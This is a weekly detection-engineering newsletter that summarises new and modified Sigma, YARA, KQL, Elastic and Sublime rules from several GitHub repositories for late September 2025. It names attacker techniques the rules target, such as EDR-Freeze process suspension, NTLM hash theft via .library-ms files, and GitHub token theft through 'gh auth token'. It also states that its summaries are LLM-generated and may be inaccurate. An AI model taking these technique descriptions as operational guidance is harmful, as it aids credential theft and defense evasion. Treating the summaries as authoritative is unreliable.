Detections Digest #20250929
The issue highlights key updates from 11 repos, including 42 new and 53 modified Elastic, YARA, Sigma, KQL and SublimeSecurity detection rules.
This week’s update highlights the most significant changes to detection rules from 11 of the 40+ monitored GitHub repositories. Between Sep 22 and Sep 29, 2025, contributors added 42 new rules and updated 53 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
Multiple repositories added detection for recent exploits. Rules target post-exploitation activity from the CrushFTP RCE (CVE-2025-54309) by monitoring for suspicious child processes. Other rules detect the creation of .library-ms files, a technique for NTLM hash theft via CVE-2025-24054. (
SigmaHQ/sigma,Yamato-Security/hayabusa-rules)New rules target defense evasion tactics across multiple projects. Detections identify the EDR-Freeze tool abusing WerFaultSecure.exe to suspend security processes. Other rules cover stealthy registry modification with wmic.exe and malicious WDAC policy creation to block security tools. (
SigmaHQ/sigma,Yamato-Security/hayabusa-rules)There is a focus on Microsoft Entra ID and identity-based threats. New KQL queries detect suspicious MFA registration, activity from anonymous IPs, and Conditional Access policy bypasses. An Elastic rule was updated to detect ‘User Access Administrator’ role elevation in Entra ID. (
elastic/detection-rules,benscha/KQLAdvancedHunting,ep3p/Sentinel_KQL,Sergio-Albea-Git/Threat-Hunting-KQL-Queries)Phishing detections were updated to counter evasive methods. New rules analyze calendar invites (.ics files) for callback phishing and suspicious sender domains. Other additions target SharePoint impersonation in email attachments through link analysis and OCR. (
sublime-security/sublime-rules)Coverage for command-and-control channels and specific malware was expanded. Detection logic for VS Code tunnels used as a C2 was broadened in Sigma rules. New YARA rules detect a variety of malware, including the PondRAT backdoor, Warlock ransomware, and the FlipSwitch rootkit. (
SigmaHQ/sigma,Yamato-Security/hayabusa-rules,reversinglabs/reversinglabs-yara-rules,elastic/protections-artifacts)
🚀 Make updates from this digest operational → All detection rules from this digest are available in our MISP and STIX/TAXII feeds ready for direct integration into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.
Table Of Contents
SigmaHQ/sigma (+11, ✎8)
elastic/detection-rules (+1, ✎3)
Yamato-Security/hayabusa-rules (+17, ✎13)
sublime-security/sublime-rules (+5, ✎11)
elastic/protections-artifacts (+1, ✎6)
ep3p/Sentinel_KQL (+2, ✎4)
bartblaze/Yara-rules (+1, ✎4)
Corporate repositories (6)
SigmaHQ/sigma (+11, ✎8)
+ New rules
Multiple new rules detect defense evasion techniques. These include the EDR-Freeze tool’s abuse of WerFaultSecure.exe to suspend security processes, use of wmic.exe with StdRegProv for stealthy registry modification, and the creation of malicious Windows Defender Application Control (WDAC) policies to block security software. (WDAC Policy File Creation In CodeIntegrity Folder, Registry Manipulation via WMI Stdregprov, Suspicious Process Suspension via WERFaultSecure through EDR-Freeze)
New detections target the abuse of legitimate administrative and security tools for malicious control. One rule identifies the command-line registration of a TacticalRMM agent, indicating a compromised host connecting to an unauthorized C2 server. Another detects the Velociraptor DFIR tool spawning suspicious child processes to download and execute remote payloads. (Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server, Suspicious Velociraptor Child Process)
Two rules detect activity related to specific CVEs. One identifies remote code execution attempts against CrushFTP (CVE-2025-54309) by monitoring for suspicious child processes like cmd.exe. The other detects creation of .library-ms files by archivers, a technique used to steal NTLMv2 hashes via CVE-2025-24054. (Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309), Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit)
Detections for specific malware families were added. One rule identifies FunkLocker ransomware by the creation of files with the .funksec extension. Another targets ClickFix malware by monitoring for malicious HTTP links written to the RunMRU registry key. (FunkLocker Ransomware File Creation, Potential ClickFix Execution Pattern - Registry)
New rules cover common C2 and credential access methods. One rule detects DNS queries to low-reputation top-level domains, often used for C2 infrastructure. Another detects direct access to the PowerShell console history file (ConsoleHost_history.txt) to find sensitive information. (Low Reputation Effective Top-Level Domain (eTLD), Potential PowerShell Console History Access Attempt via History File)
✎ Modified rules
Detection for Visual Studio Code tunnels used as a C2 channel is broadened across two rules. The logic no longer requires the ‘--name’ argument, increasing coverage for renamed or default tunnel configurations. Both rules are now mapped to MITRE ATT&CK T1219 for remote access software. (Visual Studio Code Tunnel Execution, Renamed Visual Studio Code Tunnel Execution)
Several rules detecting persistence and remote execution were tuned to reduce false positives. Exclusions were added for the Notepad++ installer writing plugin DLLs, the Dropbox client creating services with sc.exe, and PsExec-like activity targeting the local machine. (Potential PsExec Remote Execution, Potential Persistence Via Notepad++ Plugins, New Service Creation Using Sc.EXE)
Coverage for defense evasion techniques was expanded. One rule adds detection for .log and .rtf files used with regsvr32.exe to execute disguised DLLs. Another adds ‘PowerShell_ISE.EXE’ and ‘wmic.exe’ to the list of tools monitored for disabling or deleting Windows services. (Regsvr32 DLL Execution With Suspicious File Extension, Suspicious Windows Service Tampering)
Detection for the Windows Kerberos privilege escalation vulnerability CVE-2022-37966 was updated. The rule now includes an alternative event provider name, improving compatibility for identifying RC4-HMAC encryption downgrades across different logging configurations. (KDC RC4-HMAC Downgrade CVE-2022-37966)
reversinglabs/reversinglabs-yara-rules (+2)
+ New rules
Two new YARA rules detect specific malware. One identifies the PondRAT backdoor on Linux by matching hexadecimal patterns in ELF binaries. The other detects Warlock ransomware on Windows by finding its characteristic patterns for encryption and system manipulation in PE files. (Linux_Backdoor_PondRAT, Win64_Ransomware_Warlock)
elastic/detection-rules (+1, ✎3)
+ New rules
A new rule detects the Node.js runtime spawning a shell to execute the GitHub CLI command ‘gh auth token’. This targets an adversary technique for stealing GitHub authentication tokens, a behavior observed in the Shai-Hulud worm campaign. (GitHub Authentication Token Access via Node.js)
✎ Modified rules
Detection for the RemoteMonologue session hijacking technique, which modifies COM object RunAs registry values, was made more reliable. The EQL query now treats the user.id field as optional, preventing query failures and reducing potential missed detections when the field is absent. (Potential RemoteMonologue Attack)
Coverage for Microsoft Entra ID privilege escalation was improved. The rule now includes an additional condition to detect ‘User Access Administrator’ role elevation. The rule’s severity is now high, and a shorter 7-day lookback window increases its sensitivity to recent activity. (Microsoft Entra ID Elevated Access to User Access Administrator)
Accuracy for detecting stealthy PowerShell execution via DLL loading was improved by adding exceptions for legitimate software from PDQ.com, Dell, and Chocolatey. Detection coverage was also expanded by removing rundll32.exe from an exclusion list, enabling the rule to fire on this process. (Suspicious PowerShell Engine ImageLoad)
Yamato-Security/hayabusa-rules (+17, ✎13)
+ New rules
New rules detect post-exploitation activity following a CrushFTP RCE (CVE-2025-54309). Detections monitor for crushftp.exe spawning suspicious child processes such as PowerShell with encoded commands, command prompt for discovery, and various living-off-the-land binaries. (Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309), Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309))
Multiple rules target defense evasion techniques. Detections identify registry modification using wmic.exe, the abuse of WerFaultSecure.exe to suspend security processes (EDR-Freeze tool), and the creation of malicious Windows Defender Application Control policies to block security software. (Registry Manipulation via WMI Stdregprov, Registry Manipulation via WMI Stdregprov, WDAC Policy File Creation In CodeIntegrity Folder, Suspicious Process Suspension via WERFaultSecure through EDR-Freeze, Suspicious Process Suspension via WERFaultSecure through EDR-Freeze)
Detection coverage is added for the abuse of legitimate administration and DFIR tools. New rules identify the command-line installation of the TacticalRMM agent and monitor for the Velociraptor tool spawning child processes like code.exe for tunneling or msiexec.exe for remote installations. (Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server, Suspicious Velociraptor Child Process, Suspicious Velociraptor Child Process, Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server)
New rules detect specific malware families. One set targets ClickFix malware by identifying HTTP links written to the RunMRU registry key. Another rule detects FunkLocker ransomware by monitoring Sysmon events for the creation of files with the .funksec extension. (Potential ClickFix Execution Pattern - Registry, FunkLocker Ransomware File Creation, Potential ClickFix Execution Pattern - Registry)
New detections target information gathering and exploitation. Two rules identify attempts to access the PowerShell ConsoleHost_history.txt file for reconnaissance. Another rule detects the creation of .library-ms files, indicating an attempt to exploit CVE-2025-24054 for NTLM hash theft. (Potential PowerShell Console History Access Attempt via History File, Potential PowerShell Console History Access Attempt via History File, Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit)
✎ Modified rules
Detection for Visual Studio Code remote tunnel abuse, used for C2 (T1219), was broadened across four rules. The logic no longer requires the ‘--name’ argument, covering more execution variants of this remote access software technique. (Visual Studio Code Tunnel Execution, Renamed Visual Studio Code Tunnel Execution, Visual Studio Code Tunnel Execution, Renamed Visual Studio Code Tunnel Execution)
Rules for detecting Windows service manipulation were improved. Detections for tampering with existing services now include wmic.exe and WMI .delete() methods. Additionally, rules for new service creation using sc.exe were refined to filter legitimate activity from the Dropbox client. (New Service Creation Using Sc.EXE, Suspicious Windows Service Tampering, New Service Creation Using Sc.EXE, Suspicious Windows Service Tampering)
Two rules detecting remote execution with PsExec-like tools were tuned to reduce false positives. Both now filter out command-line executions targeting the local machine via localhost or loopback IP addresses. (Potential PsExec Remote Execution, Potential PsExec Remote Execution)
Coverage for Kerberos-based attacks was expanded. Rules detecting Kerberoasting (T1558.003) and a privilege escalation vulnerability (CVE-2022-37966) were updated to monitor an additional event provider name, increasing compatibility across Windows versions. (KDC RC4-HMAC Downgrade CVE-2022-37966, No Suitable Encryption Key Found For Generating Kerberos Ticket)
The rule detecting persistence via Notepad++ plugin DLLs was refined. The logic now filters out common DLLs created by the official Notepad++ installer, reducing false positives from standard software installation. (Potential Persistence Via Notepad++ Plugins)
sublime-security/sublime-rules (+5, ✎11)
+ New rules
New rules were added to detect phishing attacks that impersonate Microsoft SharePoint. Detections identify malicious links inside EML attachments by analyzing SharePoint subdomains for known malicious patterns or sender-subdomain mismatches. Another rule uses OCR and NLU to find credential theft language in PDF attachments that mimic SharePoint. (Attachment: EML with SharePoint files shared from GoDaddy federated tenants, Attachment: EML with Sharepoint link likely unrelated to sender, Brand impersonation: SharePoint PDF attachment with credential theft language)
Two rules now target evasive phishing tactics. One detects HTML obfuscation by identifying when a recipient’s domain is repeated in HTML class attributes. The other rule detects suspicious calendar invites (.ics files) that originate from domains registered within the last 90 days. (Body HTML: Recipient SLD in HTML class, Attachment: Calendar invite from recently registered domain)
✎ Modified rules
Detection for malicious calendar invites (.ics) is now more robust. Updates replace unreliable regex and string searches with structured ICS parsing to find callback phishing language and non-standard invites missing a UID field. Performance for detecting HTML smuggling in invites is also improved. (Callback phishing via calendar invite, Attachment: HTML smuggling with eval and atob via calendar invite, Non-RFC compliant calendar files from unsolicited sender)
Multiple phishing rules were tuned to reduce false positives and add specific coverage. Exclusions were added for voicemail (CheckPoint notifications), quarantine (financial comms), and SharePoint link (own tenant) phishing detections. Coverage was expanded for Wix brand impersonation and SharePoint link display text abuse. (Fake voicemail notification (untrusted sender), Fake email quarantine notification, Brand impersonation: Wix, Link: SharePoint filename matches org name)
Detection for callback phishing was improved across multiple vectors. The rule for text-based file attachments now uses more resilient keyword matching and covers Excel files. The OCR-based rule for image attachments was tuned to reduce false positives by excluding email replies. (Attachment: Callback phishing solicitation via text-based file, Attachment: Callback phishing solicitation via image file)
Updates refine detection for phishing that abuses trusted services or uses encrypted attachments. The rule for Zoom Events abuse now relies more on NLU analysis and has broader sender authentication checks. The rule for credential theft via encrypted PDFs better targets initial access by excluding replies and checking for undisclosed recipients. (Zoom Events newsletter abuse, Attachment: Encrypted PDF with credential theft body)
elastic/protections-artifacts (+1, ✎6)
+ New rules
A new YARA rule detects the FlipSwitch rootkit proof-of-concept on Linux. The rule scans x86 files and memory for hexadecimal patterns found in the rootkit’s code. (Linux_Rootkit_Flipswitch_821f3c9e)
✎ Modified rules
Additional YARA rules improve detection for Linux malware. One rule targets Conti ransomware by identifying specific strings like ‘--vmkiller’ and the ‘.conti’ file extension. A second rule detects the Xmrig cryptominer by matching multiple, distinct hexadecimal byte sequences found in its binary code. (Linux_Ransomware_Conti_a89c26cf, Linux_Cryptominer_Xmrig_77fbc695)
Cyber OSINT Overview is a free weekly newsletter by CTIChef.com that summarizes updates from 80+ sources (government orgs, cybersecurity vendors, threat intel teams, security researchers, and cybersecurity communities) into one overview.
Personal repositories (5)
benscha/KQLAdvancedHunting (✎1)
✎ Modified rules
The KQL query for suspicious Azure AD MFA registration was modified to reduce alert volume. The logic now excludes a defined internal IP range and de-duplicates alerts to show only the earliest anomalous registration event per actor. (Suspicious_MFA_Registration)
ep3p/Sentinel_KQL (+2, ✎4)
+ New rules
A new KQL query tracks device account deletions and disablements across both on-premises Active Directory and Microsoft Entra ID. It correlates Windows Security Events (4725, 5136) with Entra ID audit logs to create a consolidated timeline of device removals. (removed device events)
A new KQL query detects user activity from anonymous IP addresses flagged by Microsoft Defender for Cloud Apps. It joins AADUserRiskEvents with SecurityAlert and sign-in logs to give a correlated view of authentications from anonymizing services. (Multiple-Activity from anonymous IP addresses)
✎ Modified rules
Three KQL queries for detecting suspicious Azure AD activity were rewritten to improve their core logic. They now query the AADUserRiskEvents table directly for events like new country sign-ins, suspicious inbox forwarding, and inbox manipulation rules. This replaces the previous method of starting from the SecurityAlert table, resulting in more direct detection of identity risks. (Multiple-Activity from infrequent country, Multiple-Suspicious inbox forwarding rule, Multiple-Suspicious inbox manipulation rule)
Detection of unusual remote sessions on domain controllers is refined to reduce false positives. The rule now filters out activity from known Privileged Access Management (PAM) system IP addresses by dynamically populating an exclusion list from a watchlist, separating legitimate administrative actions from potential threats. (SecurityEvent-Possible unusual remote session in a domain controller)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+2)
+ New rules
A new KQL query detects outbound SMB or NTLM negotiation with external, non-private IP addresses. This rule identifies potential data exfiltration or credential relay attacks by inspecting traffic on both standard and non-standard ports for SMB/NTLM signatures. (SMB & NTLM Negotiation to Unknown Remote IPs)
A new KQL query detects a potential bypass of Microsoft Entra Conditional Access policies. The detection identifies when a user with assigned roles initiates a private browsing session on a device with an existing trusted session, a method to circumvent device-based checks. (Detecting potential CA policy bypass by privileged accounts via private browser sessions)
bartblaze/Yara-rules (+1, ✎4)
+ New rules
A new YARA rule detects a backdoored version of the libcef.dll file reportedly used by an APT actor. Detection is based on the presence of specific strings within the file that indicate command-and-control capabilities, such as error messages for failing to list processes or create a pipe. (Libcef_Backdoor)
✎ Modified rules
A new set of YARA rules detects malicious Windows Shortcut (LNK) files. One rule identifies LNK files by their magic bytes, acting as a base for the others. The subsequent rules find embedded PowerShell commands, scripting artifacts like JScript and VBScript, and executable content by looking for specific keywords, script engine names, and Base64-encoded MZ headers. (isLNK, PS_in_LNK, Script_in_LNK, EXE_in_LNK)
Neo23x0/signature-base (✎3)
✎ Modified rules
New YARA rules detect malware associated with the China-nexus actor UNC5221. Detection for the BRICKSTORM backdoor identifies ELF files through magic numbers, byte patterns, and strings. A separate rule detects the SLAYSTYLE Java webshell by finding code for HTTP handling, Base64 decoding, and command execution. (MAL_G_APT_Backdoor_BRICKSTORM_2, WEBSHELL_G_APT_BackdoorWebshell_SLAYSTYLE_1)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We’d be happy to help — contact us.